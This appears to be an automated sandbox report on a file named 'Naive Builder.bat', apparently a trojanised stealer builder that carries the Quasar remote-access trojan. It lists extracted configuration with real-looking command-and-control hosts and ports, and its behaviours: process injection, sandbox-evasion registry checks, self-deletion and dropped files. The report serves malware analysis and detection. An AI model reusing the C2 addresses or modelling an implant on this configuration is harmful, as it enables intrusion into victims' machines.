Analysis
- max time kernel: 300s
- max time network: 301s
- platform: windows10-ltsc 2021_x64
- resource: win10ltsc2021-20241023-en
- resource tags: arch:x64, arch:x86, image:win10ltsc2021-20241023-en, locale:en-us, os:windows10-ltsc 2021-x64, system
- submitted: 04-12-2024 09:28
Static task: static1
Behavioral task: behavioral1
- Sample: Obekräftade 974555.zip
- Resource: win10ltsc2021-20241023-en
Behavioral task: behavioral2
- Sample: naive-stealer-main/Naive Builder.bat
- Resource: win10ltsc2021-20241023-en
General
- Target: naive-stealer-main/Naive Builder.bat
- Size: 12.8MB
- MD5: a2e3e4286e8b22b3b021a6706b899dd7
- SHA1: e6179204735421c3927f27c13f9751af1dce9bd2
- SHA256: efd80dd8487437f58413be6e7d2da6ea866ae7626b3225dbf326e8c82c85e580
- SHA512: 3ff5d19accd1fa6765ffc3554bb9cfe3989eee4cf226c2ce7abbaff47a1586253ab1b408f4f9e47611ea7d2415f3298b12dfada1d1987d43c2efa16aac11e3e8
- SSDEEP: 49152:JZHKpAhg6/Ri76PuM0gcqQP+GBRa1SgA+754EU1kOeTUliFDvnrNqjdsusoj8nNc:e
Malware Config
Extracted
- Family: quasar
- Version: 1.0.0.0
- Botnet: v15.6.3 | xen
- C2:
  studies-royal.at.ply.gg:31849
  usa-departments.at.ply.gg:37274
  category-in.at.ply.gg:42204
- Mutex: bd62476d-8a2b-4e05-a8e5-68cc94baac4f
- encryption_key: AA41DD5506DCFCA6EE3BF934CC3C9319F80E5E10
- install_name: .exe
- log_directory: $sxr-Logs
- reconnect_delay: 5000
- startup_key: $sxr-seroxen
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
Processes:
resource | yara_rule
behavioral2/memory/3288-56-0x000002D7255B0000-0x000002D725D6C000-memory.dmp | family_quasar
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
Processes:
description | pid | Process | procid_target
PID 1056 created 632 | 1056 | Naive Builder.bat.exe | 5
PID 3288 created 632 | 3288 | $sxr-powershell.exe | 5
PID 3288 created 632 | 3288 | $sxr-powershell.exe | 5
PID 1056 created 632 | 1056 | Naive Builder.bat.exe | 5
PID 1056 created 632 | 1056 | Naive Builder.bat.exe | 5
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | wmiprvse.exe
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | Naive Builder.bat.exe
-
Deletes itself 1 IoCs
Processes:
pid | Process
1056 | Naive Builder.bat.exe
-
Executes dropped EXE 3 IoCs
Processes:
pid | Process
1056 | Naive Builder.bat.exe
3288 | $sxr-powershell.exe
2408 | $sxr-powershell.exe
-
Hide Artifacts: Hidden Window 1 TTPs 2 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
Processes:
pid | Process
3288 | $sxr-powershell.exe
2408 | $sxr-powershell.exe
-
Drops file in System32 directory 21 IoCs
Processes:
description | ioc | Process
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | svchost.exe
File created | C:\Windows\System32\vcruntime140d.dll | Naive Builder.bat.exe
File opened for modification | C:\Windows\System32\ucrtbased.dll | Naive Builder.bat.exe
File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | svchost.exe
File created | C:\Windows\System32\vcruntime140_1d.dll | Naive Builder.bat.exe
File opened for modification | C:\Windows\System32\vcruntime140_1d.dll | Naive Builder.bat.exe
File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | svchost.exe
File opened for modification | C:\Windows\System32\vcruntime140d.dll | Naive Builder.bat.exe
File opened for modification | C:\Windows\System32\ucrtbased.dll | $sxr-powershell.exe
File opened for modification | C:\Windows\System32\vcruntime140d.dll | $sxr-powershell.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
File created | C:\Windows\System32\ucrtbased.dll | Naive Builder.bat.exe
File opened for modification | C:\Windows\System32\vcruntime140_1d.dll | $sxr-powershell.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe
-
Suspicious use of SetThreadContext 5 IoCs
Processes:
description | pid | Process | procid_target
PID 1056 set thread context of 2548 | 1056 | Naive Builder.bat.exe | 93
PID 3288 set thread context of 2276 | 3288 | $sxr-powershell.exe | 95
PID 3288 set thread context of 1720 | 3288 | $sxr-powershell.exe | 97
PID 1056 set thread context of 5876 | 1056 | Naive Builder.bat.exe | 99
PID 1056 set thread context of 1216 | 1056 | Naive Builder.bat.exe | 100
-
Drops file in Windows directory 6 IoCs
Processes:
description | ioc | Process
File opened for modification | C:\Windows\$sxr-mshta.exe | Naive Builder.bat.exe
File created | C:\Windows\$sxr-seroxen2\$sxr-Uni.bat | cmd.exe
File opened for modification | C:\Windows\$sxr-seroxen2\$sxr-Uni.bat | cmd.exe
File created | C:\Windows\$sxr-powershell.exe | Naive Builder.bat.exe
File opened for modification | C:\Windows\$sxr-powershell.exe | Naive Builder.bat.exe
File created | C:\Windows\$sxr-mshta.exe | Naive Builder.bat.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
pid | Process
928 | cmd.exe
3280 | PING.EXE
-
Checks processor information in registry 2 TTPs 11 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | mousocoreworker.exe
Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | mousocoreworker.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | mousocoreworker.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | mousocoreworker.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | mousocoreworker.exe
-
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | wmiprvse.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | mousocoreworker.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | mousocoreworker.exe
-
Kills process with taskkill 1 IoCs
Processes:
pid | Process
3024 | taskkill.exe
-
Modifies data under HKEY_USERS 29 IoCs
Processes:
mousocoreworker.exeOfficeClickToRun.exesvchost.exesvchost.exedescription ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "001840102DFB2A9A" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 04 Dec 2024 09:30:50 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\001840102DFB2A9A = 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 mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1733304649" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = 
"5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} mousocoreworker.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb010000008908107a9e8bcf4fa1bbf80efb7a6b1500000000020000000000106600000001000020000000a3d31f015037b5dc7b913a1f19f2bea3dde88eb563ef66a05e20ccf104cec8ad000000000e80000000020000200000009a7b5e8a342263bdf7a5e1a58be2844f85293b9658d343cbed31bf180c5802f9b0030000f5be9f000368aa56b6beb33acd7b5d114f8d050ef5cc7384bb7172c95cca4387b8a3930875b80b8fdca04d296b7e7cc0464fd4f750838ca74cf5f00bc055fb34d39830d4e917a2944f8e5869ce5fb08ce036cc899bce2412f4b493f0f6f08a4be1aa834d28bb9a9c72b99e9015ab1f63a135f69f426d3eb5a123173ee068139f13c69a6091cf2fa3e8a697ac642fd13b1d372fbddcd037b95a9751b7b254e8afd9af6387d620e79fa2f442fbf4d861ef85463a1c5a3a08e69617428b2a1d997f2121477bac4f1700d5ddc75c74d15d6a0135e0766a37e186a596ab094d55a1cd201889866f81178257176d5e9da10629a315831062c2ca89a2c47aa39d6f52ee20475c1890c5b849e3f74164ac7ca343d7e7101d1b74ed0b166f7b50c6ecf37c84109972dfdcfa2543597beb5680a5d2b72483a9ef00dd468f6432d97cf97fb63f801966281ef5d041e0e8eb4e9c6242bb8cc2175e3b3ddbd281f564daeb33b7364ab54d325531679a44764184e7d63609d05c987f09a5e17900759d68ff0d478f0b32104a91d32a3feb38d152798769527714d6a12aded99a0ffff0bf0d8acf49b437b94865c107096935cdef8e6385e29bc98208d8a121f7ad85fe548d29d0f3b55adf8d057c64d95f15fe4e633b2d09396207746e032755a2008bdc445b569733cac8dad408c59b3c567d43a9c50ff6a0ae1718b324dd2ba88403eb784f0d17f
f1363d2fe8bce059da193383aa9bc83883dd96a37e51856632ea2fc48abf3430a08739cb4fffd01e0c232c8e05895d7fb208b6bec1757808158fbc30edd615383a0d4be816ebc4defc32a3d942137bc56c3a9d51cd27745017fdd9681bf463e984748b7145745557ee8346b452e0cc66322bf07f847b35583fbe8e9ee446f137506469fb55316a5704f45283217c4b977ff70079e03d811cf6315ca81d09cc5922bece2b710f5e01a11ebe0ec9efaf3c4be92d995d5d6e65b163581100723d65355fceecc2ae4b64248ddeec72beb82498e5e2535cd64ab243928d539f73589844eeb9319e84e5ab606638d9ba22952f91e8ef8c70531f2f6f1874613e37ec953e28472a68f602567360fcee2eebb9cf0d9858507887810ed2a8c9dadaf2ff3a58580e8c0c68f5eef69854056e67e65516314f640a43b8f1a44c7bdb5194ccf7a3642c5102d08ad93f49beee0a1ff7578ff5169b1ed55201f70f4d9842bb33257a5bac49c0d929a24070976a0d9571d088ea288ec786d158a8f9eaef5f86a1b544f1eecefcc17e1fce7aa3e298c399543026a855f741fe4db57517ae2ef56e52bea6e296615384c26379713b4d4e44000000058b665d6def8cdb75986aa088d8a351999f7b3f4380b3e675cfa3493812c37843e19c049dd8a3578102d49b7976937ad94c2c1f275ace8d0abfc317e4c79e400 mousocoreworker.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={FF03C59F-8B1A-4917-92D7-93C74CBDDEEA}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" 
OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "001840102DFB2A9A" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Naive Builder.bat.exedllhost.exe$sxr-powershell.exedllhost.exe$sxr-powershell.exedllhost.exepid Process 1056 Naive Builder.bat.exe 1056 Naive Builder.bat.exe 1056 Naive Builder.bat.exe 2548 dllhost.exe 2548 dllhost.exe 2548 dllhost.exe 2548 dllhost.exe 1056 Naive Builder.bat.exe 1056 Naive Builder.bat.exe 3288 $sxr-powershell.exe 3288 $sxr-powershell.exe 3288 $sxr-powershell.exe 3288 $sxr-powershell.exe 2276 dllhost.exe 2276 dllhost.exe 2276 dllhost.exe 2276 dllhost.exe 3288 $sxr-powershell.exe 3288 $sxr-powershell.exe 2408 $sxr-powershell.exe 2408 $sxr-powershell.exe 3288 $sxr-powershell.exe 1720 dllhost.exe 1720 dllhost.exe 2408 $sxr-powershell.exe 2408 $sxr-powershell.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe 1720 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Naive Builder.bat.exedllhost.exe$sxr-powershell.exedllhost.exe$sxr-powershell.exedllhost.exesvchost.exesvchost.exedescription pid Process Token: SeDebugPrivilege 1056 Naive Builder.bat.exe Token: SeDebugPrivilege 1056 Naive Builder.bat.exe Token: SeDebugPrivilege 2548 dllhost.exe Token: SeDebugPrivilege 3288 $sxr-powershell.exe Token: SeDebugPrivilege 3288 $sxr-powershell.exe Token: SeDebugPrivilege 2276 dllhost.exe Token: SeDebugPrivilege 2408 $sxr-powershell.exe Token: SeDebugPrivilege 3288 $sxr-powershell.exe Token: SeDebugPrivilege 1720 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2332 svchost.exe Token: SeIncreaseQuotaPrivilege 2332 svchost.exe Token: SeSecurityPrivilege 2332 svchost.exe Token: SeTakeOwnershipPrivilege 2332 svchost.exe Token: SeLoadDriverPrivilege 2332 svchost.exe Token: SeSystemtimePrivilege 2332 svchost.exe Token: SeBackupPrivilege 2332 svchost.exe Token: SeRestorePrivilege 2332 svchost.exe Token: SeShutdownPrivilege 2332 svchost.exe Token: SeSystemEnvironmentPrivilege 2332 svchost.exe Token: SeUndockPrivilege 2332 svchost.exe Token: SeManageVolumePrivilege 2332 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2332 svchost.exe Token: SeIncreaseQuotaPrivilege 2332 svchost.exe Token: SeSecurityPrivilege 2332 svchost.exe Token: SeTakeOwnershipPrivilege 2332 svchost.exe Token: SeLoadDriverPrivilege 2332 svchost.exe Token: SeSystemtimePrivilege 2332 svchost.exe Token: SeBackupPrivilege 2332 svchost.exe Token: SeRestorePrivilege 2332 svchost.exe Token: SeShutdownPrivilege 2332 svchost.exe Token: SeSystemEnvironmentPrivilege 2332 svchost.exe Token: SeUndockPrivilege 2332 svchost.exe Token: SeManageVolumePrivilege 2332 svchost.exe Token: SeAuditPrivilege 2740 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2332 svchost.exe Token: SeIncreaseQuotaPrivilege 2332 svchost.exe Token: SeSecurityPrivilege 2332 svchost.exe Token: SeTakeOwnershipPrivilege 2332 svchost.exe Token: SeLoadDriverPrivilege 2332 svchost.exe Token: SeSystemtimePrivilege 2332 
svchost.exe Token: SeBackupPrivilege 2332 svchost.exe Token: SeRestorePrivilege 2332 svchost.exe Token: SeShutdownPrivilege 2332 svchost.exe Token: SeSystemEnvironmentPrivilege 2332 svchost.exe Token: SeUndockPrivilege 2332 svchost.exe Token: SeManageVolumePrivilege 2332 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2332 svchost.exe Token: SeIncreaseQuotaPrivilege 2332 svchost.exe Token: SeSecurityPrivilege 2332 svchost.exe Token: SeTakeOwnershipPrivilege 2332 svchost.exe Token: SeLoadDriverPrivilege 2332 svchost.exe Token: SeSystemtimePrivilege 2332 svchost.exe Token: SeBackupPrivilege 2332 svchost.exe Token: SeRestorePrivilege 2332 svchost.exe Token: SeShutdownPrivilege 2332 svchost.exe Token: SeSystemEnvironmentPrivilege 2332 svchost.exe Token: SeUndockPrivilege 2332 svchost.exe Token: SeManageVolumePrivilege 2332 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2332 svchost.exe Token: SeIncreaseQuotaPrivilege 2332 svchost.exe Token: SeSecurityPrivilege 2332 svchost.exe Token: SeTakeOwnershipPrivilege 2332 svchost.exe Token: SeLoadDriverPrivilege 2332 svchost.exe Token: SeSystemtimePrivilege 2332 svchost.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
pid | Process
3288 | $sxr-powershell.exe
2872 | Conhost.exe
-
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid | Process
3636 | Explorer.EXE
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exenet.exeNaive Builder.bat.exe$sxr-powershell.exedllhost.exedescription pid Process procid_target PID 4584 wrote to memory of 3808 4584 cmd.exe 82 PID 4584 wrote to memory of 3808 4584 cmd.exe 82 PID 3808 wrote to memory of 1252 3808 net.exe 83 PID 3808 wrote to memory of 1252 3808 net.exe 83 PID 4584 wrote to memory of 1056 4584 cmd.exe 84 PID 4584 wrote to memory of 1056 4584 cmd.exe 84 PID 1056 wrote to memory of 2548 1056 Naive Builder.bat.exe 93 PID 1056 wrote to memory of 2548 1056 Naive Builder.bat.exe 93 PID 1056 wrote to memory of 2548 1056 Naive Builder.bat.exe 93 PID 1056 wrote to memory of 2548 1056 Naive Builder.bat.exe 93 PID 1056 wrote to memory of 2548 1056 Naive Builder.bat.exe 93 PID 1056 wrote to memory of 2548 1056 Naive Builder.bat.exe 93 PID 1056 wrote to memory of 2548 1056 Naive Builder.bat.exe 93 PID 1056 wrote to memory of 3288 1056 Naive Builder.bat.exe 94 PID 1056 wrote to memory of 3288 1056 Naive Builder.bat.exe 94 PID 3288 wrote to memory of 2276 3288 $sxr-powershell.exe 95 PID 3288 wrote to memory of 2276 3288 $sxr-powershell.exe 95 PID 3288 wrote to memory of 2276 3288 $sxr-powershell.exe 95 PID 3288 wrote to memory of 2276 3288 $sxr-powershell.exe 95 PID 3288 wrote to memory of 2276 3288 $sxr-powershell.exe 95 PID 3288 wrote to memory of 2276 3288 $sxr-powershell.exe 95 PID 3288 wrote to memory of 2276 3288 $sxr-powershell.exe 95 PID 3288 wrote to memory of 2408 3288 $sxr-powershell.exe 96 PID 3288 wrote to memory of 2408 3288 $sxr-powershell.exe 96 PID 3288 wrote to memory of 1720 3288 $sxr-powershell.exe 97 PID 3288 wrote to memory of 1720 3288 $sxr-powershell.exe 97 PID 3288 wrote to memory of 1720 3288 $sxr-powershell.exe 97 PID 3288 wrote to memory of 1720 3288 $sxr-powershell.exe 97 PID 3288 wrote to memory of 1720 3288 $sxr-powershell.exe 97 PID 3288 wrote to memory of 1720 3288 $sxr-powershell.exe 97 PID 3288 wrote to memory of 1720 3288 $sxr-powershell.exe 97 PID 3288 wrote to memory of 1720 3288 $sxr-powershell.exe 
97 PID 3288 wrote to memory of 1720 3288 $sxr-powershell.exe 97 PID 1720 wrote to memory of 632 1720 dllhost.exe 5 PID 1720 wrote to memory of 688 1720 dllhost.exe 7 PID 1720 wrote to memory of 968 1720 dllhost.exe 12 PID 1720 wrote to memory of 420 1720 dllhost.exe 13 PID 1720 wrote to memory of 436 1720 dllhost.exe 14 PID 1720 wrote to memory of 740 1720 dllhost.exe 15 PID 1720 wrote to memory of 752 1720 dllhost.exe 16 PID 1720 wrote to memory of 1076 1720 dllhost.exe 17 PID 1720 wrote to memory of 1104 1720 dllhost.exe 18 PID 1720 wrote to memory of 1132 1720 dllhost.exe 19 PID 1720 wrote to memory of 1200 1720 dllhost.exe 20 PID 1720 wrote to memory of 1272 1720 dllhost.exe 22 PID 1720 wrote to memory of 1320 1720 dllhost.exe 23 PID 1720 wrote to memory of 1344 1720 dllhost.exe 24 PID 1720 wrote to memory of 1360 1720 dllhost.exe 25 PID 1720 wrote to memory of 1524 1720 dllhost.exe 26 PID 1720 wrote to memory of 1568 1720 dllhost.exe 27 PID 1720 wrote to memory of 1596 1720 dllhost.exe 28 PID 1720 wrote to memory of 1688 1720 dllhost.exe 29 PID 1720 wrote to memory of 1732 1720 dllhost.exe 30 PID 1720 wrote to memory of 1796 1720 dllhost.exe 31 PID 1720 wrote to memory of 1840 1720 dllhost.exe 32 PID 1720 wrote to memory of 1976 1720 dllhost.exe 33 PID 1720 wrote to memory of 1984 1720 dllhost.exe 34 PID 1720 wrote to memory of 1992 1720 dllhost.exe 35 PID 1720 wrote to memory of 1036 1720 dllhost.exe 36 PID 1720 wrote to memory of 1208 1720 dllhost.exe 37 PID 1720 wrote to memory of 2116 1720 dllhost.exe 38 PID 1720 wrote to memory of 2216 1720 dllhost.exe 40 PID 1720 wrote to memory of 2332 1720 dllhost.exe 41 PID 1720 wrote to memory of 2452 1720 dllhost.exe 42 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
- [1] C:\Windows\system32\winlogon.exe
  Command line: winlogon.exe
  PID: 632
  - [2] C:\Windows\system32\dwm.exe
    Command line: "dwm.exe"
    PID: 1076
  - [2] C:\Windows\System32\dllhost.exe
    Command line: C:\Windows\System32\dllhost.exe /Processid:{7d50530d-3820-4ee1-84d3-f6176f3b0029}
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 2548
  - [2] C:\Windows\System32\dllhost.exe
    Command line: C:\Windows\System32\dllhost.exe /Processid:{b84deb7f-7243-4ae3-86eb-bac0e4178d51}
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 2276
  - [2] C:\Windows\System32\dllhost.exe
    Command line: C:\Windows\System32\dllhost.exe /Processid:{011e311b-be34-4675-8a1d-5c78776361cb}
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 1720
  - [2] C:\Windows\System32\dllhost.exe
    Command line: C:\Windows\System32\dllhost.exe /Processid:{a5d80aa4-8f62-4e9d-b96e-ec241d4e7440}
    PID: 5876
  - [2] C:\Windows\System32\dllhost.exe
    Command line: C:\Windows\System32\dllhost.exe /Processid:{8d8dfa74-db64-40fe-a3dc-d9798da551c4}
    PID: 1216
- [1] C:\Windows\system32\lsass.exe
  Command line: C:\Windows\system32\lsass.exe
  PID: 688
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
  PID: 968
- [1] C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
  PID: 420
- [1] C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
  PID: 436
- [1] C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
  PID: 740
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
  PID: 752
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
  PID: 1104
- [1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
  PID: 1132
